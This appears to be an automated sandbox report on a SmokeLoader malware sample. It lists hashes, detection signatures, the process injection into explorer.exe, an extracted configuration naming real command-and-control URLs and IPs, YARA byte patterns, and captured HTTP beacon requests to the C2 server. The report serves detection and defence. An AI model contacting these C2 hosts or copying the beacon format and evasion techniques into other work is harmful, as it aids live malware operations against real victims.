Edit tour

Windows Analysis Report
K80v6DHFHE.exe

Overview

General Information

Sample name:	K80v6DHFHE.exe renamed because original name is a hash value
Original sample name:	278df1e655d9d27b659468ea21758d17.exe
Analysis ID:	1532605
MD5:	278df1e655d9d27b659468ea21758d17
SHA1:	51d59cbc9e28708086517ea33ff07a9b2cfb3fcf
SHA256:	2b727f4b529097748b5c49720bb42da02efb7758bf6870acfd4404c24b60840b
Tags:	exeStealcuser-abuse_ch
Infos:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected SmokeLoader

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Sigma detected: Execution of Suspicious File Type Extension

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

K80v6DHFHE.exe (PID: 5544 cmdline: "C:\Users\user\Desktop\K80v6DHFHE.exe" MD5: 278DF1E655D9D27B659468EA21758D17)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

wafguag (PID: 6100 cmdline: C:\Users\user\AppData\Roaming\wafguag MD5: 278DF1E655D9D27B659468EA21758D17)

wafguag (PID: 2936 cmdline: C:\Users\user\AppData\Roaming\wafguag MD5: 278DF1E655D9D27B659468EA21758D17)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1931909855.0000000002B7D000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x313f:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1931965782.0000000002C70000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1931984278.0000000002C80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1931984278.0000000002C80000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000005.00000002.2220751054.0000000002C80000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1932109842.00000000046A1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1932109842.00000000046A1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000005.00000002.2220908287.0000000002DC1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.2220908287.0000000002DC1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000005.00000002.2220782028.0000000002C90000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.2220782028.0000000002C90000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000005.00000002.2221046473.0000000002DFC000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x37d7:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Click to see the 7 entries

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\wafguag, CommandLine: C:\Users\user\AppData\Roaming\wafguag, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\wafguag, NewProcessName: C:\Users\user\AppData\Roaming\wafguag, OriginalFileName: C:\Users\user\AppData\Roaming\wafguag, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\wafguag, ProcessId: 6100, ProcessName: wafguag

Suricata Signatures

ET MALWARE Suspected Smokeloader Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T18:27:45.303931+0200	2039103	1	A Network Trojan was detected	192.168.2.4	64968	148.230.249.9	80	TCP
2024-10-13T18:27:46.963293+0200	2039103	1	A Network Trojan was detected	192.168.2.4	64969	148.230.249.9	80	TCP
2024-10-13T18:27:47.919755+0200	2039103	1	A Network Trojan was detected	192.168.2.4	64970	148.230.249.9	80	TCP
2024-10-13T18:27:48.894639+0200	2039103	1	A Network Trojan was detected	192.168.2.4	64971	148.230.249.9	80	TCP
2024-10-13T18:27:49.898590+0200	2039103	1	A Network Trojan was detected	192.168.2.4	64972	148.230.249.9	80	TCP
2024-10-13T18:27:50.854819+0200	2039103	1	A Network Trojan was detected	192.168.2.4	64973	148.230.249.9	80	TCP
2024-10-13T18:27:51.827443+0200	2039103	1	A Network Trojan was detected	192.168.2.4	64974	148.230.249.9	80	TCP
2024-10-13T18:27:52.778261+0200	2039103	1	A Network Trojan was detected	192.168.2.4	64975	148.230.249.9	80	TCP
2024-10-13T18:27:53.738201+0200	2039103	1	A Network Trojan was detected	192.168.2.4	64976	148.230.249.9	80	TCP
2024-10-13T18:27:54.709329+0200	2039103	1	A Network Trojan was detected	192.168.2.4	64977	148.230.249.9	80	TCP
2024-10-13T18:27:55.664115+0200	2039103	1	A Network Trojan was detected	192.168.2.4	64978	148.230.249.9	80	TCP
2024-10-13T18:27:56.624121+0200	2039103	1	A Network Trojan was detected	192.168.2.4	64979	148.230.249.9	80	TCP
2024-10-13T18:27:57.590520+0200	2039103	1	A Network Trojan was detected	192.168.2.4	64981	148.230.249.9	80	TCP
2024-10-13T18:27:58.543210+0200	2039103	1	A Network Trojan was detected	192.168.2.4	64987	148.230.249.9	80	TCP
2024-10-13T18:27:59.558359+0200	2039103	1	A Network Trojan was detected	192.168.2.4	64993	148.230.249.9	80	TCP
2024-10-13T18:28:00.521490+0200	2039103	1	A Network Trojan was detected	192.168.2.4	64999	148.230.249.9	80	TCP
2024-10-13T18:28:01.500523+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65005	148.230.249.9	80	TCP
2024-10-13T18:28:02.470685+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65016	148.230.249.9	80	TCP
2024-10-13T18:28:03.627242+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65022	148.230.249.9	80	TCP
2024-10-13T18:28:04.593154+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65028	148.230.249.9	80	TCP
2024-10-13T18:28:05.564245+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65034	148.230.249.9	80	TCP
2024-10-13T18:28:06.520404+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65046	148.230.249.9	80	TCP
2024-10-13T18:28:07.527668+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65052	148.230.249.9	80	TCP
2024-10-13T18:28:08.550643+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65058	148.230.249.9	80	TCP
2024-10-13T18:28:09.504054+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65064	148.230.249.9	80	TCP
2024-10-13T18:28:10.465258+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65070	148.230.249.9	80	TCP
2024-10-13T18:28:11.447931+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65080	148.230.249.9	80	TCP
2024-10-13T18:28:12.404007+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65082	148.230.249.9	80	TCP
2024-10-13T18:28:13.361965+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65092	148.230.249.9	80	TCP
2024-10-13T18:28:14.318728+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65099	148.230.249.9	80	TCP
2024-10-13T18:28:15.828924+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65105	148.230.249.9	80	TCP
2024-10-13T18:28:16.790815+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65115	148.230.249.9	80	TCP
2024-10-13T18:28:17.753342+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65122	148.230.249.9	80	TCP
2024-10-13T18:28:18.775757+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65128	148.230.249.9	80	TCP
2024-10-13T18:28:19.728904+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65134	148.230.249.9	80	TCP
2024-10-13T18:28:20.704701+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65140	148.230.249.9	80	TCP
2024-10-13T18:29:26.607711+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65270	148.230.249.9	80	TCP
2024-10-13T18:29:28.771259+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65271	148.230.249.9	80	TCP
2024-10-13T18:29:30.033311+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65272	148.230.249.9	80	TCP
2024-10-13T18:29:31.548788+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65273	148.230.249.9	80	TCP
2024-10-13T18:29:32.705945+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65274	148.230.249.9	80	TCP
2024-10-13T18:29:38.370062+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65275	148.230.249.9	80	TCP
2024-10-13T18:29:43.415784+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65276	148.230.249.9	80	TCP
2024-10-13T18:29:48.487284+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65277	148.230.249.9	80	TCP
2024-10-13T18:29:53.628328+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65278	148.230.249.9	80	TCP
2024-10-13T18:29:59.682273+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65279	148.230.249.9	80	TCP
2024-10-13T18:30:06.086268+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65280	148.230.249.9	80	TCP
2024-10-13T18:30:12.261434+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65281	148.230.249.9	80	TCP
2024-10-13T18:30:21.478641+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65282	190.156.239.49	80	TCP
2024-10-13T18:30:27.201694+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65283	190.156.239.49	80	TCP
2024-10-13T18:30:33.413089+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65284	190.156.239.49	80	TCP
2024-10-13T18:30:39.987751+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65285	190.156.239.49	80	TCP
2024-10-13T18:30:45.633160+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65286	190.156.239.49	80	TCP
2024-10-13T18:30:52.041561+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65287	190.156.239.49	80	TCP
2024-10-13T18:30:57.539699+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65288	190.156.239.49	80	TCP
2024-10-13T18:31:04.509515+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65289	190.156.239.49	80	TCP
2024-10-13T18:31:10.096614+0200	2039103	1	A Network Trojan was detected	192.168.2.4	65290	190.156.239.49	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: K80v6DHFHE.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\wafguag

Avira: detection malicious, Label: HEUR/AGEN.1312571

Found malware configuration

Source: 00000000.00000002.1931984278.0000000002C80000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}

Multi AV Scanner detection for domain / URL

Source: nwgrus.ru	Virustotal: Detection: 12%			Perma Link
Source: http://nwgrus.ru/tmp/index.php	Virustotal: Detection: 16%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\wafguag	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Roaming\wafguag	Virustotal: Detection: 41%			Perma Link

Multi AV Scanner detection for submitted file

Source: K80v6DHFHE.exe	ReversingLabs: Detection: 39%
Source: K80v6DHFHE.exe	Virustotal: Detection: 41%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\wafguag

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: K80v6DHFHE.exe

Joe Sandbox ML: detected

Source: K80v6DHFHE.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\K80v6DHFHE.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64987 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64969 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64968 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64971 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64978 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64981 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65022 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64993 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64970 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65005 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64975 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64976 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64973 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65016 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65058 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65046 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65028 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64977 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65080 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65082 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64974 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65092 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65099 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65064 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64999 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65122 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64979 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65128 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65115 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65034 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65134 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:64972 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65070 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65052 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65140 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65105 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65271 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65270 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65272 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65274 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65277 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65275 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65283 -> 190.156.239.49:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65282 -> 190.156.239.49:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65281 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65276 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65273 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65279 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65285 -> 190.156.239.49:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65290 -> 190.156.239.49:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65287 -> 190.156.239.49:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65288 -> 190.156.239.49:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65278 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65284 -> 190.156.239.49:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65280 -> 148.230.249.9:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65289 -> 190.156.239.49:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:65286 -> 190.156.239.49:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 190.156.239.49 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 148.230.249.9 80			Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://nwgrus.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://tech-servers.in.net/tmp/index.php
Source: Malware configuration extractor	URLs: http://unicea.ws/tmp/index.php

Source: Joe Sandbox View	IP Address: 190.156.239.49 190.156.239.49
Source: Joe Sandbox View	IP Address: 148.230.249.9 148.230.249.9

Source: Joe Sandbox View	ASN Name: TelmexColombiaSACO TelmexColombiaSACO
Source: Joe Sandbox View	ASN Name: LVLT-3549US LVLT-3549US

Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oiwjgaljhmhwar.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 222Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://upppthvngavhg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xbxjiiplcauibu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uowfkuajgbrsxf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bsujqjcrhguj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://akxpcpdhnwlcvewi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yvuudhqxndfwr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fgueognrgcdryprb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hvywquxnrrbp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cacpihwweubtsxg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 238Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rqcdsrhbxdj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 340Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://llagbnlopmmumxog.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 337Host: nwgrus.ru
